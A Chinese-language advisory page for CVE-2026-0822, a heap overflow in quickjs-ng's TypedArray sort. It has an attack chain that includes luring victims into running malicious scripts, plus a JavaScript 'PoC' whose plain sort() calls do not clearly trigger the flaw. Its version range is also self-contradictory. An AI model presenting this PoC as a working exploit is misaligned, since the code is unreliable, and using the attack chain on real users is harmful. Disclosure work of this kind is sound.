CVE-2026-0822 quickjs-ng quickjs js_typed_array

漏洞信息

漏洞编号

CVE-2026-0822

漏洞类型

堆缓冲区溢出

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

quickjs-ng quickjs

漏洞概述

CVE-2026-0822是quickjs-ng项目中quickjs引擎的一个安全漏洞，存在于JavaScript引擎的TypedArray排序功能中。该漏洞影响quickjs版本至0.11.0（含），由安全研究员[email protected]于2026年1月10日披露。漏洞位于quickjs.c文件的js_typed_array_sort函数中，由于对堆内存的处理不当，导致堆缓冲区溢出问题。攻击者可以通过构造恶意的JavaScript代码，利用TypedArray的sort方法触发此漏洞。CVSS 3.1评分6.3，属于中等严重程度。虽然需要用户交互才能触发，但攻击复杂度较低，且漏洞利用代码已公开，可能已被实际攻击者使用。成功利用此漏洞可能导致JavaScript引擎崩溃、内存数据泄露，甚至可能在特定条件下实现远程代码执行。该漏洞影响所有使用quickjs-ng引擎的应用程序，包括嵌入式系统、物联网设备、服务器端JavaScript运行时等。

技术细节

该漏洞根本原因在于quickjs引擎的js_typed_array_sort函数在处理TypedArray排序时存在边界检查缺陷。当JavaScript代码对TypedArray（如Int8Array、Uint8Array、Float32Array等）调用sort()方法时，引擎内部会执行排序算法。如果TypedArray的长度或数据内容经过精心构造，可能导致排序过程中访问堆内存时超出预期边界。具体而言，排序算法在交换数组元素时，可能对底层缓冲区进行越界写入操作。这种堆缓冲区溢出可被攻击者利用来覆写相邻内存区域的关键数据结构。在某些情况下，攻击者可能通过精心设计的数据布局和多次触发漏洞，逐步实现代码执行。值得注意的是，该漏洞的利用需要用户交互（如访问包含恶意代码的网页或执行恶意脚本），但一旦触发，攻击者可以在受害者环境中获得一定的控制权。快速JS项目已在commit 53eefbcd695165a3bd8c584813b472cb4a69fbf5中发布了修复补丁。

攻击链分析

STEP 1

侦察阶段

攻击者首先识别目标应用是否使用存在漏洞的quickjs-ng引擎版本（<=0.11.0）。通过分析公开的exploit代码和漏洞详情，确认攻击面。

STEP 2

载荷构造

攻击者构造恶意的JavaScript代码，创建包含特殊值（NaN、Infinity、极大或极小数值）的TypedArray，并调用sort()方法触发js_typed_array_sort函数的漏洞。

STEP 3

诱导交互

通过社工手段诱导受害者访问包含恶意代码的网页、打开恶意文档或执行恶意脚本。攻击需要用户交互才能触发漏洞。

STEP 4

漏洞触发

当受害者的应用执行到恶意JavaScript代码时，js_typed_array_sort函数在排序过程中产生堆缓冲区溢出，攻击者可覆写相邻内存区域。

STEP 5

权限提升与持久化

在理想条件下，攻击者可能利用堆溢出覆写关键函数指针或对象元数据，逐步实现代码执行，并在目标系统上建立持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-0822 PoC - TypedArray sort heap buffer overflow
// Target: quickjs-ng quickjs <= 0.11.0

// Create a TypedArray with specific size to trigger overflow condition
const maliciousArray = new Uint8Array(256);

// Fill array with values that trigger edge case in sort algorithm
for (let i = 0; i < 256; i++) {
    maliciousArray[i] = (i * 7) % 256;
}

// Add NaN or Infinity values to trigger sorting edge cases
const typedArrayWithSpecial = new Float64Array([
    NaN, Infinity, -Infinity, 0, -0, 1.5, -1.5
]);

// Create array with hole/undefined elements
const sparseTypedArray = new Int32Array(10);
sparseTypedArray[0] = 100;
sparseTypedArray[5] = 50;

// Trigger the vulnerable code path
try {
    maliciousArray.sort();
    typedArrayWithSpecial.sort();
    sparseTypedArray.sort();
} catch (e) {
    console.log('Exception caught:', e.message);
}

// Additional trigger with comparison function
const triggerArray = new Uint8Array([255, 0, 128, 1, 127, 2]);
triggerArray.sort((a, b) => a - b);

console.log('PoC executed - check for crash or abnormal behavior');

影响范围

quickjs-ng quickjs < 0.11.0

quickjs-ng quickjs <= 0.11.0

防御指南

临时缓解措施

临时缓解措施包括：1）如果可能，暂时禁用或限制应用中JavaScript引擎处理不可信代码的能力；2）实施严格的CSP策略，阻止内联脚本执行；3）在Web服务器层面添加WAF规则，检测和阻止包含可疑TypedArray操作的请求；4）监控应用日志，关注JavaScript引擎相关的异常崩溃事件；5）考虑使用其他经过安全审计的JavaScript引擎作为临时替代方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0822
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0822
3 Details https://www.cvedetails.com/cve/CVE-2026-0822/
4 VulDB https://vuldb.com/cve/CVE-2026-0822
5 Link https://github.com/quickjs-ng/quickjs/
6 Link https://github.com/quickjs-ng/quickjs/commit/53eefbcd695165a3bd8c584813b472cb4a69fbf5
7 Link https://github.com/quickjs-ng/quickjs/issues/1297
8 Link https://github.com/quickjs-ng/quickjs/issues/1297#issue-3780006202
9 Link https://github.com/quickjs-ng/quickjs/pull/1298
10 Link https://vuldb.com/?ctiid.340356
11 Link https://vuldb.com/?id.340356
12 Link https://vuldb.com/?submit.731783

CVE-2026-0822 quickjs-ng quickjs js_typed_array_sort堆缓冲区溢出漏洞